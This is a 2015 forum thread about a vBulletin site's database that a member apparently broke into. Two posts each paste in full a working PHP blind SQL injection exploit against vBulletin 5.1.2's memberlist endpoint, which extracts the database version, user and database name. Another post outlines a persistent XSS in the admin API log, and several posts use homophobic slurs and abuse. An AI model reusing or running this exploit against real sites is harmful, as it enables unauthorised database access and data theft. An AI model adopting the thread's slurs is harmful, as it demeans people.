lanny why have you named your database table and username both VB

2015-06-30 at 7:17 PM UTC

#1

The Self Taught Man Black Hole

Couldn't think of anything better?

2015-06-30 at 10:48 PM UTC

#2

Sophie Pedophile Tech Support

Maybe VB is the default account.

2015-06-30 at 10:55 PM UTC

#3

The Self Taught Man Black Hole

Maybe VB is the default account.

no such thing.

2015-06-30 at 10:59 PM UTC

#4

Sophie Pedophile Tech Support

no such thing.

Alright then IDK why.

2015-06-30 at 11:29 PM UTC

#5

The Self Taught Man Black Hole

Alright then IDK why.

it's cause he got lazy and just name his db info vb

2015-07-01 at 12:39 AM UTC

#6

Arnox Yung Blood

It's the default.

2015-07-01 at 12:49 AM UTC

#7

The Self Taught Man Black Hole

It's the default.

shut up jake you gaping faggot.

2015-07-01 at 1:26 AM UTC

#8

mmQ Lisa Turtle

I agree with The Dragon.

2015-07-01 at 1:36 AM UTC

#9

Michael Myers victim of incest [divide your nonresilient tucker]

How do you even know he named it that? Are you a hax0r?

2015-07-01 at 1:41 AM UTC

#10

The Self Taught Man Black Hole

How do you even know he named it that? Are you a hax0r?

I haxed the database.

2015-07-01 at 1:50 AM UTC

#11

arthur treacher African Astronaut

I am disgusted by how you said 'gaping faggot'. I never thought of it like that, and now I hate life.

-edit- I guess that is what goatse is. Why do you make me think of this stuff? fuck.

2015-07-01 at 3:17 AM UTC

#12

Arnox Yung Blood

shut up jake you gaping faggot.

Who the heck is Jake? Maybe you could call me Big Jake though and I could wear a cowboy hat.

2015-07-01 at 3:17 AM UTC

#13

Lanny Bird of Courage

Couldn't think of anything better?

I couldn't but then I'm not sure why it matters or what would be "better".

I'm assuming you used that memberlist exploit? Should be patched now.

2015-07-01 at 4:44 AM UTC

#14

-SpectraL coward [the spuriously bluish-lilac bushman]

<?php
 
/*
    Author: Nytro
    Powered by: Romanian Security Team
    Price: Free. Educational.
*/
 
 
error_reporting(E_ALL);
ini_set('display_errors', 1);
 
 
// Get arguments
 
 
$target_url = isset($argv[1]) ? $argv[1] : 'https://rstforums.com/v5';
$expression = str_replace('/', '\\/', $target_url);
 
 
// Function to send a POST request
 
 
function httpPost($url,$params)
{
    $ch = curl_init($url);
 
 
    curl_setopt($ch, CURLOPT_URL,$url);
    curl_setopt($ch, CURLOPT_RETURNTRANSFER,true);
    curl_setopt($ch, CURLOPT_HEADER, false);
    curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
    curl_setopt($ch, CURLOPT_POST, 1);
    curl_setopt($ch, CURLOPT_POSTFIELDS, $params);
     
    curl_setopt($ch, CURLOPT_HTTPHEADER, array(
        'User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:30.0) Gecko/20100101 Firefox/30.0',
        'Accept: application/json, text/javascript, */*; q=0.01',
        'X-Requested-With: XMLHttpRequest',
        'Referer: https://rstforums.com/v5/memberlist',
        'Accept-Language: en-US,en;q=0.5',
        'Cookie: bb_lastvisit=1400483408; bb_lastactivity=0;'
     ));
 
 
    $output = curl_exec($ch);
     
    if($output == FALSE) print htmlspecialchars(curl_error($ch));
 
 
    curl_close($ch);
    return $output;
}
 
 
// Function to get string between two other strings
 
 
function get_string_between($string, $start, $end)
{
    $string = " ".$string;
    $ini = strpos($string,$start);
    if ($ini == 0) return "";
    $ini += strlen($start);
    $len = strpos($string,$end,$ini) - $ini;
    return substr($string,$ini,$len);
}
 
 
// Get version
 
 
print "\r\nRomanian Security Team - vBulltin 5.1.2 SQL Injection\r\n\r\n";
print "Version: ";
 
 
$result = httpPost($target_url . '/ajax/render/memberlist_items',
        'criteria[perpage]=10&criteria[startswith]="+OR+SUBSTR(user.username,1,1)=SUBSTR(version(),1  ,1)--+"+' .
        '&criteria[sortfield]=username&criteria[sortorder]=asc&securitytoken=guest');
 
 
$letter = 1;
 
 
while(strpos($result, 'No Users Matched Your Query') == false)
{
    $exploded = explode('<span class=\"h-left\">\r\n\t\t\t\t\t\t\t\t\t<a href=\"' . $expression . '\/member\/', $result);
 
 
    $username = get_string_between($exploded[1], '">', '<\/a>');
    print $username[0];
     
    $letter++;
    $result = httpPost($target_url . '/ajax/render/memberlist_items',
            'criteria[perpage]=10&criteria[startswith]="+OR+SUBSTR(user.username,1,1)=SUBSTR(version(  ),' . $letter . ',1)--+"+' .
            '&criteria[sortfield]=username&criteria[sortorder]=asc&securitytoken=guest');
}
 
 
// Get user
 
 
print "\r\nUser: ";
 
 
$result = httpPost($target_url . '/ajax/render/memberlist_items',
        'criteria[perpage]=10&criteria[startswith]="+OR+SUBSTR(user.username,1,1)=SUBSTR(user(),1  ,1)--+"+' .
        '&criteria[sortfield]=username&criteria[sortorder]=asc&securitytoken=guest');
 
 
$letter = 1;
 
 
while(strpos($result, 'No Users Matched Your Query') == false)
{
    $exploded = explode('<span class=\"h-left\">\r\n\t\t\t\t\t\t\t\t\t<a href=\"' . $expression . '\/member\/', $result);
 
 
    $username = get_string_between($exploded[1], '">', '<\/a>');
    print $username[0];
 
 
    $letter++;
    $result = httpPost($target_url . '/ajax/render/memberlist_items',
            'criteria[perpage]=10&criteria[startswith]="+OR+SUBSTR(user.username,1,1)=SUBSTR(user(),' . $letter . ',1)--+"+' .
            '&criteria[sortfield]=username&criteria[sortorder]=asc&securitytoken=guest');
}
 
 
// Get database
 
 
print "\r\nDatabse: ";
 
 
$result = httpPost($target_url . '/ajax/render/memberlist_items',
        'criteria[perpage]=10&criteria[startswith]="+OR+SUBSTR(user.username,1,1)=SUBSTR(database(),  1,1)--+"+' .
        '&criteria[sortfield]=username&criteria[sortorder]=asc&securitytoken=guest');
 
 
$letter = 1;
 
 
while(strpos($result, 'No Users Matched Your Query') == false)
{
    $exploded = explode('<span class=\"h-left\">\r\n\t\t\t\t\t\t\t\t\t<a href=\"' . $expression . '\/member\/', $result);
 
 
    $username = get_string_between($exploded[1], '">', '<\/a>');
    print $username[0];
 
 
    $letter++;
    $result = httpPost($target_url . '/ajax/render/memberlist_items',
            'criteria[perpage]=10&criteria[startswith]="+OR+SUBSTR(user.username,1,1)=SUBSTR(database(),  ' . $letter . ',1)--+"+' .
            '&criteria[sortfield]=username&criteria[sortorder]=asc&securitytoken=guest');
}
 
 
print "\r\n"
 
 
?>

2015-07-01 at 4:56 AM UTC

#15

Sophie Pedophile Tech Support

<?php

/*
Author: Nytro
Powered by: Romanian Security Team
Price: Free. Educational.
*/


error_reporting(E_ALL);
ini_set('display_errors', 1);


// Get arguments


$target_url = isset($argv[1]) ? $argv[1] : 'https://rstforums.com/v5';
$expression = str_replace('/', '\\/', $target_url);


// Function to send a POST request


function httpPost($url,$params)
{
$ch = curl_init($url);


curl_setopt($ch, CURLOPT_URL,$url);
curl_setopt($ch, CURLOPT_RETURNTRANSFER,true);
curl_setopt($ch, CURLOPT_HEADER, false);
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
curl_setopt($ch, CURLOPT_POST, 1);
curl_setopt($ch, CURLOPT_POSTFIELDS, $params);

curl_setopt($ch, CURLOPT_HTTPHEADER, array(
'User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:30.0) Gecko/20100101 Firefox/30.0',
'Accept: application/json, text/javascript, */*; q=0.01',
'X-Requested-With: XMLHttpRequest',
'Referer: https://rstforums.com/v5/memberlist',
'Accept-Language: en-US,en;q=0.5',
'Cookie: bb_lastvisit=1400483408; bb_lastactivity=0;'
));


$output = curl_exec($ch);

if($output == FALSE) print htmlspecialchars(curl_error($ch));


curl_close($ch);
return $output;
}


// Function to get string between two other strings


function get_string_between($string, $start, $end)
{
$string = " ".$string;
$ini = strpos($string,$start);
if ($ini == 0) return "";
$ini += strlen($start);
$len = strpos($string,$end,$ini) - $ini;
return substr($string,$ini,$len);
}


// Get version


print "\r\nRomanian Security Team - vBulltin 5.1.2 SQL Injection\r\n\r\n";
print "Version: ";


$result = httpPost($target_url . '/ajax/render/memberlist_items',
'criteria[perpage]=10&criteria[startswith]="+OR+SUBSTR(user.username,1,1)=SUBSTR(version(),1 ,1)--+"+' .
'&criteria[sortfield]=username&criteria[sortorder]=asc&securitytoken=guest');


$letter = 1;


while(strpos($result, 'No Users Matched Your Query') == false)
{
$exploded = explode('<span class=\"h-left\">\r\n\t\t\t\t\t\t\t\t\t<a href=\"' . $expression . '\/member\/', $result);


$username = get_string_between($exploded[1], '">', '<\/a>');
print $username[0];

$letter++;
$result = httpPost($target_url . '/ajax/render/memberlist_items',
'criteria[perpage]=10&criteria[startswith]="+OR+SUBSTR(user.username,1,1)=SUBSTR(version( ),' . $letter . ',1)--+"+' .
'&criteria[sortfield]=username&criteria[sortorder]=asc&securitytoken=guest');
}


// Get user


print "\r\nUser: ";


$result = httpPost($target_url . '/ajax/render/memberlist_items',
'criteria[perpage]=10&criteria[startswith]="+OR+SUBSTR(user.username,1,1)=SUBSTR(user(),1 ,1)--+"+' .
'&criteria[sortfield]=username&criteria[sortorder]=asc&securitytoken=guest');


$letter = 1;


while(strpos($result, 'No Users Matched Your Query') == false)
{
$exploded = explode('<span class=\"h-left\">\r\n\t\t\t\t\t\t\t\t\t<a href=\"' . $expression . '\/member\/', $result);


$username = get_string_between($exploded[1], '">', '<\/a>');
print $username[0];


$letter++;
$result = httpPost($target_url . '/ajax/render/memberlist_items',
'criteria[perpage]=10&criteria[startswith]="+OR+SUBSTR(user.username,1,1)=SUBSTR(user(),' . $letter . ',1)--+"+' .
'&criteria[sortfield]=username&criteria[sortorder]=asc&securitytoken=guest');
}


// Get database


print "\r\nDatabse: ";


$result = httpPost($target_url . '/ajax/render/memberlist_items',
'criteria[perpage]=10&criteria[startswith]="+OR+SUBSTR(user.username,1,1)=SUBSTR(database(), 1,1)--+"+' .
'&criteria[sortfield]=username&criteria[sortorder]=asc&securitytoken=guest');


$letter = 1;


while(strpos($result, 'No Users Matched Your Query') == false)
{
$exploded = explode('<span class=\"h-left\">\r\n\t\t\t\t\t\t\t\t\t<a href=\"' . $expression . '\/member\/', $result);


$username = get_string_between($exploded[1], '">', '<\/a>');
print $username[0];


$letter++;
$result = httpPost($target_url . '/ajax/render/memberlist_items',
'criteria[perpage]=10&criteria[startswith]="+OR+SUBSTR(user.username,1,1)=SUBSTR(database(), ' . $letter . ',1)--+"+' .
'&criteria[sortfield]=username&criteria[sortorder]=asc&securitytoken=guest');
}


print "\r\n"


?>

Lanny patched it already but i dig the script.

2015-07-01 at 6:08 AM UTC

#16

Arnox Yung Blood

I think it's pretty sad that Lanny has to do Internet Brands' job for them. They've had literally YEARS to patch this crap.

2015-07-01 at 6:20 AM UTC

#17

Sophie Pedophile Tech Support

I think it's pretty sad that Lanny has to do Internet Brands' job for them. They've had literally YEARS to patch this crap.

I found more.

Persistent XSS vulnerability.

vBulletin 4/5 does not properly sanitize client provided xmlrpc attributes (e.g. client name) allowing the remote xmlrpc client to inject code into the xmlrpc API logging page. Code is executed once an admin visits the API log page and clicks on the API clients name.

Vulnerable component: ./admincp/apilog.php?do=viewclient apilog.php does not sanitize xmlrpc client provided data before passing it to print_label_row to generate the output page.

2015-07-04 at 4:50 PM UTC

#18

Michael Myers victim of incest [divide your nonresilient tucker]

I haxed the database.

Oh shit!!! BRUH.

2019-12-07 at 2:57 PM UTC

#19

AngryIVer African Astronaut [my jade controlled morrigan]

I'm confused, did we used to run something other than half baked hand written BBS software?

User Controls

Navigation

lanny why have you named your database table and username both VB